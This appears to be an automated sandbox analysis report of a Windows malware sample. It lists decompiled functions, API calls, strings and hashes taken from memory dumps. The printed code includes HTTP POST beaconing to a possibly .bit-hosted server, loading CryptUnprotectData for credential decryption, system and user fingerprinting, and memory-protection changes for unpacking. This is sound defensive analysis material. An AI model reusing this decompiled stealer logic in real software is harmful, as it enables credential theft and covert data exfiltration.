Gdiplus.dll, xrefs: 00417244, 0041725E, 00417278, 00417292, 004172AC, 004172C6, 004172E0
GdiplusShutdown, xrefs: 00417259
GdipGetImageEncodersSize, xrefs: 0041728D
ole32.dll, xrefs: 004172FA, 00417314
crtdll.dll, xrefs: 0041722A
GdipSaveImageToStream, xrefs: 004172DB
GdipCreateBitmapFromHBITMAP, xrefs: 00417273
GdiplusStartup, xrefs: 0041723F
wcscmp, xrefs: 00417225

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
API String ID: 2574300362-2815069134
Opcode ID: 6066d74275340564eb798eb54cff0014ed99463c17dffbc14204bf95336a66af
Instruction ID: 88d1ed536910c73cd15d425763909c73792c0e606fd49294d8ff60234fce0fcb
Opcode Fuzzy Hash: 6066d74275340564eb798eb54cff0014ed99463c17dffbc14204bf95336a66af
Instruction Fuzzy Hash: BD11EDF16D8304B5C60077F2FD47ADA26657645709361453BBE10B20E2D57C6881A69D

Uniqueness

Uniqueness Score: -1.00%

Function 00417D84, Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 377
libraryloadernetworkCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00417D84(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				_Unknown_base(*)()* _v24;
				_Unknown_base(*)()* _v28;
				_Unknown_base(*)()* _v32;
				_Unknown_base(*)()* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				_Unknown_base(*)()* _v48;
				char _v52;
				char _v56;
				long _v60;
				void* _v64;
				void* _v68;
				int _v72;
				char _v73;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v132;
				char _v388;
				char _v516;
				char _v644;
				char _v2692;
				char _v3716;
				char _v3776;
				void _v69412;
				char _v69416;
				char _v69420;
				char _v69424;
				char _v69428;
				char _v69432;
				char _v69436;
				char _v69440;
				void* __ecx;
				long _t224;
				long _t293;
				void* _t307;
				struct HINSTANCE__* _t325;
				struct HINSTANCE__* _t329;
				void* _t330;
				intOrPtr _t332;
				intOrPtr _t356;
				void* _t365;
				struct _SYSTEMTIME _t376;
				intOrPtr* _t378;
				intOrPtr _t380;
				intOrPtr _t381;
				char _t396;

				_t380 = _t381;
				_t332 = 0x21e7;
				do {
					_push(0);
					_push(0);
					_t332 = _t332 - 1;
				} while (_t332 != 0);
				_t1 =  &_v8;
				 *_t1 = _t332;
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				_t376 =  &_v3776;
				_push(_t380);
				_push(0x418292);
				_push( *[fs:eax]);
				 *[fs:eax] = _t381;
				if(_v16 == 0) {
					E0040357C( &_v16, 0x4182ac);
				}
				E004034E4( &_v92);
				E0040357C( &_v56, _v8);
				_v73 = 0;
				E0040357C( &_v52, "wininet.dll");
				_t329 = GetModuleHandleA(E004039E8( &_v52));
				if(_t329 == 0) {
					_t325 = LoadLibraryA(E004039E8( &_v52)); // executed
					_t329 = _t325;
				}
				_v20 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0xc]));
				_v24 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x1a]));
				_v28 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x2b]));
				_v32 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x3c]));
				_v36 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x53]));
				_v40 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x64]));
				_t378 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x75]));
				_v44 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x89]));
				_v48 = GetProcAddress(_t329,  &((E004039E8( &_v52))[0x9b]));
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				 *_t376 = 0x3c;
				 *((intOrPtr*)(_t376 + 4)) =  &_v132;
				 *((intOrPtr*)(_t376 + 8)) = 0x20;
				 *(_t376 + 0x10) =  &_v388;
				 *((intOrPtr*)(_t376 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t376 + 0x1c)) =  &_v516;
				 *((intOrPtr*)(_t376 + 0x20)) = 0x80;
				 *((intOrPtr*)(_t376 + 0x24)) =  &_v644;
				 *((intOrPtr*)(_t376 + 0x28)) = 0x80;
				 *(_t376 + 0x2c) =  &_v2692;
				 *((intOrPtr*)(_t376 + 0x30)) = 0x800;
				 *((intOrPtr*)(_t376 + 0x34)) =  &_v3716;
				 *((intOrPtr*)(_t376 + 0x38)) = 0x400;
				_t224 = E00403790(_v56);
				InternetCrackUrlA(E00403990(_v56), _t224, 0x90000000, _t376);
				E004036DC( &_v100,  *(_t376 + 0x10));
				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
				if(E00403AD4(0x418374, _v69416) != 0) {
					_v73 = 1;
					E004036DC( &_v69420,  *(_t376 + 0x10));
					E004037DC( &_v88, _v69420, "Host: ");
					E00417668(_v100, _t329,  &_v69424, _t376, _t378);
					 *(_t376 + 0x10) = E00403990(_v69424);
				}
				_t330 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
				if(_t330 != 0) {
					_v84 = 0x2dc6c0;
					_v48(_t330, 6,  &_v84, 4);
					_v48(_t330, 5,  &_v84, 4);
					_v64 = InternetConnectA(_t330,  *(_t376 + 0x10),  *(_t376 + 0x18), 0, 0, 3, 0, 0);
					if(_v64 != 0) {
						_v80 = 0x84003300;
						E004036DC( &_v69428,  *((intOrPtr*)(_t376 + 4)));
						if(E00403AD4(0x4183c8, _v69428) != 0) {
							_v80 = _v80 | 0x00800000;
						}
						_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t376 + 0x2c), 0, 0, 0, _v80, 0);
						if(_v68 != 0) {
							if(_v73 != 0) {
								_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
							}
							_t293 = E00403790(_v12);
							if(HttpSendRequestA(_v68, 0x4183cc, 0, E00403990(_v12), _t293) != 0) {
								do {
									E00404F5C();
									_v72 = InternetReadFile(_v68,  &_v69412, 0x10064,  &_v60);
									E004035D4( &_v96, _v60,  &_v69412);
									_t307 = E00403798( &_v92, _v96);
									asm("sbb eax, eax");
								} while (_t307 + 1 != 0 && _v60 != 0);
							}
						}
						InternetCloseHandle(_v68); // executed
					}
					 *_t378(_v64);
				}
				 *_t378(_t330);
				_t396 = _v92;
				if(_t396 == 0) {
					_push(_v100);
					_push(_v12);
					_push( *(_t376 + 0x18));
					_push( &_v92);
					E004036DC( &_v69432,  *(_t376 + 0x2c));
					_push(_v69432);
					E004036DC( &_v69436,  *(_t376 + 0x10));
					_pop(_t365);
					E00417820(_v69436, _t330, _v16, _t365, _t378);
				}
				E004038DC(_v16, 0x4182ac);
				if(_t396 == 0) {
					E0040627C(_v100, _t330,  &_v69440, _t378, _t396);
					E004038DC(_v69440, "4188DA24");
					if(_t396 != 0) {
						E004034E4( &_v92);
					}
				}
				E00403538(_a4, _v92);
				E004034E4( &_v92);
				_pop(_t356);
				 *[fs:eax] = _t356;
				_push(E00418299);
				E00403508( &_v69440, 7);
				E00403508( &_v100, 4);
				E00403508( &_v56, 2);
				return E00403508( &_v16, 3);
			}

0x00417d85
0x00417d88
0x00417d8d
0x00417d8d
0x00417d8f
0x00417d91
0x00417d91
0x00417d94
0x00417d94
0x00417d9a
0x00417d9d
0x00417da0
0x00417da6
0x00417dae
0x00417db6
0x00417dbb
0x00417dc3
0x00417dc4
0x00417dc9
0x00417dcc
0x00417dd3
0x00417ddd
0x00417ddd
0x00417de5
0x00417df0
0x00417df5
0x00417e01
0x00417e14
0x00417e18
0x00417e23
0x00417e28
0x00417e28
0x00417e3c
0x00417e51
0x00417e66
0x00417e7b
0x00417e90
0x00417ea5
0x00417eba
0x00417ed0
0x00417ee7
0x00417ef2
0x00417f02
0x00417f12
0x00417f22
0x00417f32
0x00417f42
0x00417f4e
0x00417f53
0x00417f5c
0x00417f5f
0x00417f6c
0x00417f6f
0x00417f7c
0x00417f7f
0x00417f8c
0x00417f8f
0x00417f9c
0x00417f9f
0x00417fac
0x00417faf
0x00417fbf
0x00417fce
0x00417fd7
0x00417ff8
0x0041800f
0x00418011
0x0041801e
0x00418031
0x0041803f
0x0041804f
0x0041804f
0x00418062
0x00418066
0x0041806c
0x0041807c
0x00418088
0x004180a2
0x004180a9
0x004180af
0x004180bf
0x004180d6
0x004180d8
0x004180d8
0x004180ff
0x00418106
0x00418110
0x0041812d
0x0041812d
0x00418133
0x00418152
0x00418154
0x0041815f
0x0041817b
0x0041818a
0x00418195
0x0041819e
0x004181a1
0x00418154
0x00418152
0x004181af
0x004181af
0x004181b5
0x004181b5
0x004181b8
0x004181ba
0x004181be
0x004181c3
0x004181c7
0x004181cc
0x004181d0
0x004181da
0x004181e5
0x004181ef
0x004181fd
0x004181fe
0x004181fe
0x0041820b
0x00418210
0x0041821b
0x0041822b
0x00418230
0x00418235
0x00418235
0x00418230
0x00418240
0x00418248
0x0041824f
0x00418252
0x00418255
0x00418265
0x00418272
0x0041827f
0x00418291

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E0F
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E23
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E37
GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E4C
GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E61
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E76
GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417E8B
GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EA0
GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417EB5
GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417ECB
GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417EE2
InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FCE
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041805F
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041809F
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180FC
HttpSendRequestA.WININET(00000000,004183CC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041814D
InternetReadFile.WININET(00000000,?,00010064,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00418178
InternetCloseHandle.WININET(00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 004181AF

Strings

wininet.dll, xrefs: 00417DFC
.bit, xrefs: 00418003
POST, xrefs: 00417DD8, 00418206
4188DA24, xrefs: 00418226
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 0041805A
Host: , xrefs: 0041802C

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Internet$HandleHttpOpenRequest$CloseConnectCrackFileLibraryLoadModuleReadSend
String ID: .bit$4188DA24$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
API String ID: 2047011702-3379068564
Opcode ID: 0da7cbf54a970580aa0b26cc4aa0c5e3ec31825bdda546eca6c3c88b70640b78
Instruction ID: 25a4a03a9f7ad5ca19830e541fee6fd6c7da8d6099e3497fbdcec988a6cf554b
Opcode Fuzzy Hash: 0da7cbf54a970580aa0b26cc4aa0c5e3ec31825bdda546eca6c3c88b70640b78
Instruction Fuzzy Hash: 1CE1FFB1900218ABDB10EFA5CC46FDEBBB8BF48305F10457AF504B7691DB78AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004A0000, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 285memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,72D08B8C), ref: 004A018C
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 004A01FD

Strings

, xrefs: 004A02D6
a, xrefs: 004A02CB

Memory Dump Source

Source File: 00000000.00000002.544445284.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID: Virtual$AllocProtect
String ID: $a
API String ID: 2447062925-206647194
Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction ID: 32f35f77c26991cdd7d3a413109c7dd3f5cc8f944ba48d7e458e609993ac7a73
Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
Instruction Fuzzy Hash: 2CC16871508301CFCB24CF24C494B2AB7E2FF9A314F55896EE8869B352C775E849CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0046052B, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00460620
VirtualAlloc.KERNEL32(00000000,0000078E,00003000,00000040), ref: 00460E91

Strings

$%^&, xrefs: 0046054E
VirtualAlloc, xrefs: 004605D0, 004605D6

Memory Dump Source

Source File: 00000000.00000002.544411405.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: $%^&$VirtualAlloc
API String ID: 4275171209-2930927500
Opcode ID: a97786759e54dfb22ed3f7dda0be957b5147da7297c0018401eaeb001c559ff2
Instruction ID: edf7f7eec6db4acfbacbbe2182e2a6d0dca53c4ae9080f9e249849febba98166
Opcode Fuzzy Hash: a97786759e54dfb22ed3f7dda0be957b5147da7297c0018401eaeb001c559ff2
Instruction Fuzzy Hash: 3A51F830E042998FDF11DB68C4947EFBBF1AF59304F18409AD585AB342D6B94921CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 004065F0, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065F0(void* __eax) {
				short _v516;
				int _t7;
				void* _t12;
				DWORD* _t15;

				_t15 =  &_v516;
				_t12 = __eax;
				 *_t15 = 0xff;
				_t7 = GetUserNameW( &_v516, _t15); // executed
				if(_t7 == 0) {
					return E00403BDC(_t12);
				}
				return E00403D6C(_t12, 0x100,  &_v516);
			}

0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00000000
0x00406627
0x00000000

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757

Uniqueness

Uniqueness Score: -1.00%

Function 00406BD8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406BD8(void* __eax) {
				char _v516;
				int _v520;
				void* _v524;
				long _t13;
				long _t19;
				long _t23;
				void* _t26;

				_t26 = __eax;
				_v520 = 0x100;
				E00403C18(__eax, 0x406c70);
				_t13 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0, 0, 0x20019, 0,  &_v524, 0); // executed
				if(_t13 == 0) {
					_t19 = RegQueryValueExW(_v524, L"ProductName", 0, 0,  &_v516,  &_v520); // executed
					if(_t19 == 0) {
						E00403D6C(_t26, 0x100,  &_v516);
					}
					_t23 = RegCloseKey(_v524); // executed
					return _t23;
				}
				return _t13;
			}

0x00406bdf
0x00406be1
0x00406bf0
0x00406c1a
0x00406c1e
0x00406c3f
0x00406c43
0x00406c50
0x00406c50
0x00406c60
0x00000000
0x00406c60
0x00406c69

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F
RegCloseKey.KERNEL32(00000000,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 00406C60

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09
ProductName, xrefs: 00406C2E

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocCloseCreateQueryStringValue
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3260168215-1787575317
Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6AA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A6AA() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				 *0x41ca68 =  *0x41ca68 - 1;
				if( *0x41ca68 < 0) {
					_t2 = LoadLibraryA("crypt32.dll"); // executed
					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
					 *0x41ca64 = _t3;
					return _t3;
				}
				return _t1;
			}

0x0040a6ac
0x0040a6b3
0x0040a6bf
0x0040a6c5
0x0040a6ca
0x00000000
0x0040a6ca
0x0040a6cf

APIs

LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5

Strings

CryptUnprotectData, xrefs: 0040A6B5
crypt32.dll, xrefs: 0040A6BA

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 2574300362-1827663648
Opcode ID: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
Opcode Fuzzy Hash: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F

Uniqueness

Uniqueness Score: -1.00%

Function 00401870, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401870() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401926);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x41c5b4);
				L004011C4();
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011CC();
				}
				E00401234(0x41c5d4);
				E00401234(0x41c5e4);
				E00401234(0x41c610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x41c60c = _t11;
				if( *0x41c60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x41c60c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x41c5f8)) = 0x41c5f4;
					 *0x41c5f4 = 0x41c5f4;
					 *0x41c600 = 0x41c5f4;
					 *0x41c5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E0040192D);
				if( *0x41c035 != 0) {
					_push(0x41c5b4);
					L004011D4();
					return 0;
				}
				return 0;
			}

0x00401875
0x00401876
0x0040187b
0x0040187e
0x00401881
0x00401886
0x00401892
0x00401894
0x00401899
0x00401899
0x004018a3
0x004018ad
0x004018b7
0x004018c3
0x004018c8
0x004018d4
0x004018d6
0x004018db
0x004018db
0x004018e3
0x004018e7
0x004018e8
0x004018f4
0x004018f7
0x004018f9
0x004018fe
0x004018fe
0x00401907
0x0040190a
0x0040190d
0x00401919
0x0040191b
0x00401920
0x00000000
0x00401920
0x00401925

APIs

RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
Opcode Fuzzy Hash: 9b657d0b75037388d40e8a3bdb897a19649f14ac25332c2b6ca82d813131726e
Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00401F5C, Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,004020D8), ref: 00401FA7
RtlLeaveCriticalSection.KERNEL32(0041C5B4,004020DF), ref: 004020D2

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
Instruction ID: 60aaef5d71d1198278099ac2c9ce8b9a20775f5f033974ed56173d7c89f55220
Opcode Fuzzy Hash: 0c1c8bb305bbff8ba2aa7aa2b7d32e669c82bb45643f7d7afb35836f5abc82eb
Instruction Fuzzy Hash: DA41CDB1A813019FD714CF29DDC56AABBA1EB59318B24C27FD505E77E1E378A841CB08

Uniqueness

Uniqueness Score: -1.00%

Function 00407C34, Relevance: 3.1, APIs: 2, Instructions: 84COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CheckFreeMembershipToken
String ID:
API String ID: 3914140973-0
Opcode ID: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
Instruction ID: b2bf85b2e2b23abc2f4a0e5b7d3564ce2fd94028ae90e1c3f906036a39e7bd64
Opcode Fuzzy Hash: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
Instruction Fuzzy Hash: 97216F75A48348BEE701CBA8CC45FAE77FCEB09704F4084B2F510E3291D375AA08875A

Uniqueness

Uniqueness Score: -1.00%

Function 00407C33, Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CheckFreeMembershipToken
String ID:
API String ID: 3914140973-0
Opcode ID: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
Instruction ID: 07ef963ec0b68deb3fcaff7dc025a93d4964a205a3b7442176a44215fb39e405
Opcode Fuzzy Hash: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
Instruction Fuzzy Hash: B6215E75A48248BEE701CBA8DC81FAE77F8EB09700F5085B2F510E36E1D375AA098759

Uniqueness

Uniqueness Score: -1.00%

Function 00407D14, Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AccountFreeLookup
String ID:
API String ID: 3905513331-0
Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004033F4, Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004033F4() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x0041C650 != 0 ||  *0x41c030 == 0) {
					L3:
					if( *0x41b004 != 0) {
						E004032DC();
						E00403368(_t32);
						 *0x41b004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x41c650)) == 2 &&  *0x41b000 == 0) {
							 *0x0041C634 = 0;
						}
						E004031DC();
						if( *((char*)(0x41c650)) <= 1 ||  *0x41b000 != 0) {
							_t14 =  *0x0041C638;
							if( *0x0041C638 != 0) {
								E004048EC(_t14);
								_t35 =  *((intOrPtr*)(0x41c638));
								_t7 = _t35 + 0x10; // 0x0
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E004031B4();
						if( *((char*)(0x41c650)) == 1) {
							 *0x0041C64C();
						}
						if( *((char*)(0x41c650)) != 0) {
							E00403338();
						}
						if( *0x41c628 == 0) {
							if( *0x41c018 != 0) {
								 *0x41c018();
							}
							ExitProcess( *0x41b000); // executed
						}
						memcpy(0x41c628,  *0x41c628, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x41b000 = 0x41b000;
					}
				} else {
					do {
						 *0x41c030 = 0;
						 *((intOrPtr*)( *0x41c030))();
